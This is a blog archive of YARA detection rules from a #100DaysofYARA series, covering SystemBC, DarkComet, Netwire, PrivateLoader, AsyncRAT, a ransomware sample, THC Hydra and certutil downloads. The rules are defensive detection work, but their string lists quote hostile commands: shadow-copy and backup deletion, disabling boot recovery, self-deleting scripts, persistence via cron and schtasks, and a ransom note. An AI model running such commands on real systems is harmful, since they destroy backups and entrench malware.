Category: YARA

#100DaysofYARA 2024 – Day 61 – SystemBC (Linux)

The SystemBC RAT/proxy also has a Linux variant; today’s rule uses strings to match that one too.

rule MAL_SystemBC_Lin_strings {
	meta:
		description = "Matches strings found in SystemBC malware Linux samples."
		last_modified = "2024-03-01"
		author = "@petermstewart"
		DaysofYara = "61/100"
		sha256 = "cf831d33e7ccbbdc4ec5efca43e28c6a6a274348bb7bac5adcfee6e448a512d9"
		sha256 = "b68bfd96f2690058414aaeb7d418f376afe5ba65d18ee4441398807b06d520fd"

	strings:
		$a1 = "Rc4_crypt" fullword
		$a2 = "newConnection" fullword
		$a3 = "/tmp/socks5.sh" fullword
		$a4 = "cat <(echo '@reboot echo" fullword
		$a5 = "socks5_backconnect" fullword

	condition:
		uint32(0) == 0x464c457f and
		2 of them
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 60 – SystemBC (Windows)

SystemBC is a persistent backdoor which allows its operators to execute commands, but also to proxy network traffic via SOCKS5 or Tor. Today’s rule matches strings found in Windows SystemBC samples.

rule MAL_SystemBC_Win_strings {
	meta:
		description = "Matches strings found in SystemBC malware Windows samples."
		last_modified = "2024-02-29"
		author = "@petermstewart"
		DaysofYara = "60/100"
		sha256 = "876c2b332d0534704447ab5f04d0eb20ff1c150fd60993ec70812c2c2cad3e6a"
		sha256 = "b9d6bf45d5a7fefc79dd567d836474167d97988fc77179a2c7a57f29944550ba"

	strings:
		$a1 = "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
		$a2 = "GET %s HTTP/1.0"
		$a3 = "Host: %s"
		$a4 = "Connection: close"
		$b1 = "BEGINDATA"
		$b2 = "HOST1:"
		$b3 = "HOST2:"
		$b4 = "PORT1:"
		$b5 = "DNS:"
		$b6 = "-WindowStyle Hidden -ep bypass -file"

	condition:
		uint16(0) == 0x5a4d and
		all of ($a*) or
		5 of ($b*)
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 59 – DarkComet RAT

The original DarkComet RAT was first developed in 2008 and is still widely used today by, basically, everyone.

rule MAL_DarkComet_strings {
	meta:
		description = "Matches strings found in DarkComet malware samples."
		last_modified = "2024-02-28"
		author = "@petermstewart"
		DaysofYara = "59/100"
		sha256 = "3e10c254d6536cc63d286b53abfebbf53785e6509ae9fb569920747d379936f6"

	strings:
		$a1 = "I wasn't able to open the hosts file, maybe because UAC is enabled in remote computer!"
		$a2 = "BTRESULTPing|Respond [OK] for the ping !|"
		$a3 = "BTRESULTClose Server|close command receive, bye bye...|"
		$a4 = "BTRESULTHTTP Flood|Http Flood task finished!|"
		$a5 = "BTRESULTMass Download|Downloading File...|"
		$a6 = "ERR|Cannot listen to port, try another one..|"

	condition:
		uint16(0) == 0x5a4d and
		all of them
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 58 – Netwire RAT

Netwire is another commodity RAT most often seen in high-volume opportunistic campaigns, but occasionally used as part of targeted operations, such as this one targeting Pakistani government organisations.

rule MAL_Netwire_strings {
	meta:
		description = "Matches strings found in NetWire malware samples."
		last_modified = "2024-02-27"
		author = "@petermstewart"
		DaysofYara = "58/100"
		sha256 = "05a36b671efa242764695140c004dfff3e0ff9d11df5d74005b7c1c8c53d8f00"
		sha256 = "d2a60c0cb4dd0c53c48bc062ca754d94df400dee9b672cf8881f5a1eff5b4fbe"

	strings:
		$ua = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
		$a1 = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
		$a2 = "Accept-Language: en-US,en;q=0.8"
		$a3 = "GET %s HTTP/1.1" 
		$b1 = "ping 192.0.2.2 -n 1 -w %d >nul 2>&1"
		$b2 = "DEL /s \"%s\" >nul 2>&1"
		$b3 = "call :deleteSelf&exit /b"
		$b4 = ":deleteSelf"
		$b5 = "start /b \"\" cmd /c del \"%%~f0\"&exit /b"
		$b6 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"
		$c1 = "%6\\EWWnid\\PI0Wld\\u6d0 aC5C\\ad8CQi5\\mWn4R aC5C"
		$c2 = "%6\\PI0Wl4Ql\\u6d0 aC5C\\ad8CQi5\\mWn4R aC5C"
		$c3 = "%6\\PWlWSW\\a0CnWR\\u6d0 aC5C\\ad8CQi5\\mWn4R aC5C"
		$c4 = "%6\\vCRSdf\\vCRSdfc0Wg6d0\\u6d0 aC5C\\ad8CQi5\\mWn4R aC5C"
		$c5 = "%6\\Tsd0C MW85gC0d\\Tsd0C M5CVid\\mWn4R aC5C"

	condition:
		uint16(0) == 0x5a4d and
		12 of them
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 57 – PrivateLoader

PrivateLoader is a downloader malware family whose primary purpose is to download and execute additional malware. Intel 471 and Walmart reported on PrivateLoader’s pay-per-install (PPI) service that distributes malware on behalf of other threat actors. The malware payloads can be selectively delivered to victims based on certain criteria (e.g. location, cryptocurrency or financial activity, on a corporate network, specific software installed, etc.) As previously reported, some of the payloads being distributed include Redline Stealer, Vidar Stealer, SmokeLoader, Stop ransomware, and other commodity malware.

Peeking into PrivateLoader, Zscaler

This rule matches PrivateLoader samples found on vx-underground:

rule MAL_PrivateLoader_strings {
	meta:
		description = "Matches strings found in PrivateLoader malware samples."
		last_modified = "2024-02-26"
		author = "@petermstewart"
		DaysofYara = "57/100"
		sha256 = "077225467638a420cf29fb9b3f0241416dcb9ed5d4ba32fdcf2bf28f095740bb"
		sha256 = "27c1ed01c767f504642801a7e7a7de8d87dbc87dee88fbc5f6adb99f069afde4"

	strings:
		$ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" ascii wide
		$b1 = ".?AVBase@Rijndael@CryptoPP@@" ascii
		$b2 = ".?AVCannotFlush@CryptoPP@@" ascii
		$b3 = ".?AVBase64Decoder@CryptoPP@@" ascii
		$b4 = ".?AVCBC_Encryption@CryptoPP@@" ascii
		$b5 = "Cleaner" ascii
		$c1 = "Content-Type: application/x-www-form-urlencoded" wide
		$c2 = "https://ipinfo.io/" wide
		$c3 = "https://db-ip.com/" wide
		$c4 = "https://www.maxmind.com/en/locate-my-ip-address" wide
		$c5 = "https://ipgeolocation.io/" wide

	condition:
		uint16(0) == 0x5a4d and
		($ua and 4 of them) or
		all of ($b*) or
		all of ($c*)
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 56 – “no virus.exe” Ransomware

Today’s rule is inspired by MalwareHunterTeam tweeting about an unidentified (by me at least) ransomware sample dropping a note named read_it.txt uploaded to VirusTotal with the filename “no virus.exe“. Seems legit. 

rule MAL_NoVirus_strings {
	meta:
		description = "Matches strings found in ransomware sample uploaded to VirusTotal with filename 'no virus.exe'."
		last_modified = "2024-02-25"
		author = "@petermstewart"
		DaysofYara = "56/100"
		sha256 = "015e546f3ac1350c5b68fedc89e16334a4e456092228e691f054c1a86fefb6c6"
		ref = "https://twitter.com/malwrhunterteam/status/1745182178474885199"

	strings:
		$a1 = "vssadmin delete shadows /all /quiet & wmic shadowcopy delete" wide
		$a2 = "bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no" wide
		$a3 = "wbadmin delete catalog -quiet" wide
		$b1 = "read_it.txt" wide
		$b2 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" wide
		$c1 = "Don't worry, you can return all your files!" wide
		$c2 = "All your files like documents, photos, databases and other important are encrypted" wide
		$c3 = "You must follow these steps To decrypt your files" wide
		$c4 = "1) CONTACT US Telegram @CryptoKeeper_Support" wide
		$c5 = "2) Obtain Bitcoin (You have to pay for decryption in Bitcoins." wide
		$c6 = "After payment we will send you the tool that will decrypt all your files.)" wide
		$c7 = "3) Send 500$ worth of btc to the next address:" wide
		$c8 = "17Ym1FfiuXGGWr1SN6enUEEZUwnsuNMUDa" wide

	condition:
		uint16(0) == 0x5a4d and
		8 of them
}

This sample also matched my TTP_contains_BTC_address and HUNT_Ransomware_generic_strings rules, which was nice to see.

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 55 – THC Hydra

Two rules today, both focusing on the Hydra network scanner maintained by The Hacker’s Choice. This probably isn’t a terribly relevant rule for actual threat hunting or detections, but seemed appropriate given yesterday’s vote in the Bundestag.

The first rule matches strings found in the Windows and Linux binaries:

rule PUP_THCHydra_strings {
    meta:
        description = "Matches strings found in the THC-Hydra network scanner."
        last_modified = "2024-02-24"
        author = "@petermstewart"
        DaysofYara = "55/100"
        ref = "https://github.com/vanhauser-thc/thc-hydra"
        ref = "https://github.com/maaaaz/thc-hydra-windows"

    strings:
        $a1 = "hydra -P pass.txt target cisco-enable  (direct console access)"
        $a2 = "hydra -P pass.txt -m cisco target cisco-enable  (Logon password cisco)"
        $a3 = "hydra -l foo -m bar -P pass.txt target cisco-enable  (AAA Login foo, password bar)"
        $a4 = "hydra -L urllist.txt -s 3128 target.com http-proxy-urlenum user:pass"
        $a5 = "hydra -L urllist.txt http-proxy-urlenum://target.com:3128/user:pass"
        $a6 = "USER hydra%d hydra %s :hydra"
        $a7 = "hydra rdp://192.168.0.1/firstdomainname -l john -p doe"
        $a8 = "User-Agent: Mozilla/4.0 (Hydra)"

    condition:
        (uint16(0) == 0x5a4d or uint32(0) == 0x464c457f) and
        all of them
}

The second rule works a bit differently and matches the default icon packaged into the Windows binary release. To be honest this one was mostly an excuse to use the YARA hash module.

rule PUP_THCHydra_default_icon {
    meta:
        description = "Matches the default icon resource section hash found in Windows THC-Hydra network scanner binaries."
        last_modified = "2024-02-24"
        author = "@petermstewart"
        DaysofYara = "55/100"
        sha256 = "ee43a7be375ae2203b635c569652f182f381b426f80430ee495aa6a96f37b4e6"
        ref = "https://github.com/maaaaz/thc-hydra-windows"

    condition:
        uint16(0) == 0x5a4d and
        for any resource in pe.resources:
        (
            hash.md5(resource.offset, resource.length) == "7835bdbf054e7ba813fa0203aa1c5e36"
        )
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 54 – AsyncRAT Github Release

After writing my rule to match AsyncRAT samples available on vx-underground, I found that it did not match the release binaries available on the AsyncRAT Github repository. I haven’t looked too closely into why that is the case. I’m a threat hunter, not a reverse engineer – you might notice that my YARA rules tend to be reliant on the output of strings!

In any case, here is a new rule that does match the Github release binary:

rule MAL_AsyncRAT_Github_release {
	meta:
		description = "Matches strings found in AsyncRAT Github release."
		last_modified = "2024-02-23"
		author = "@petermstewart"
		DaysofYara = "54/100"
		sha256 = "06899071233d61009a64c726a4523aa13d81c2517a0486cc99ac5931837008e5"
		ref = "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp"
        
	strings:
		$a1 = "NYAN-x-CAT"
		$a2 = "This program is distributed for educational purposes only."
		$a3 = "namespace AsyncRAT"
		$b1 = "[!] If you wish to upgrade to new version of AsyncRAT, You will need to copy 'ServerCertificate.p12'." wide
		$b2 = "[!] If you lose\\delete 'ServerCertificate.p12' certificate you will NOT be able to control your clients, You will lose them all." wide
		$b3 = "AsyncRAT | Dot Net Editor" wide
		$b4 = "XMR Miner | AsyncRAT" wide
		$b5 = "SEND A NOTIFICATION WHEN CLIENT OPEN A SPECIFIC WINDOW" wide
		$b6 = "Popup UAC prompt?" wide
		$b7 = "AsyncRAT | Unistall" wide
		$b8 = "recovered passwords successfully @ ClientsFolder" wide
	
	condition:
		uint16(0) == 0x5a4d and
		all of ($a*) or
		6 of ($b*)
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 53 – AsyncRAT

AsyncRAT is a popular commodity trojan often used as a credential stealer or loader for further malware. This rule matches strings found in AsyncRAT samples downloaded from vx-underground.

rule MAL_AsyncRAT_strings {
	meta:
		description = "Matches strings found in AsyncRAT samples."
		last_modified = "2024-02-22"
		author = "@petermstewart"
		DaysofYara = "53/100"
		sha256 = "00cdee79a9afc1bf239675ba0dc1850da9e4bf9a994bb61d0ec22c9fdd3aa36f"
		sha256 = "774e4d4af9175367bc3c7e08f4765778c58f1c66b46df88484a6aa829726f570"

	strings:
		$a1 = "/c schtasks /create /f /sc onlogon /rl highest /tn" wide
		$a2 = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
		$a3 = "bat.exe" wide
		$a4 = "Stub.exe" wide

	condition:
		uint16(0) == 0x5a4d and
		all of them
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.

#100DaysofYARA 2024 – Day 52 – Certutil Downloads

Just like Bitsadmin, certutil.exe is a default component of Windows and can be abused to download a file over HTTP. This rule attempts to find common certutil download commands.

rule TTP_Certutil_Download_command {
	meta:
		description = "Matches strings commonly found in certutil.exe download commands."
		last_modified = "2024-02-21"
		author = "@petermstewart"
		DaysofYara = "52/100"
		ref = "https://lolbas-project.github.io/lolbas/Binaries/Certutil/#download"

	strings:
		$a = "certutil" nocase ascii wide
		$b = "-urlcache" nocase ascii wide
		$c = "-split" nocase ascii wide
		$d = "http" nocase ascii wide

	condition:
		all of them
}

Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.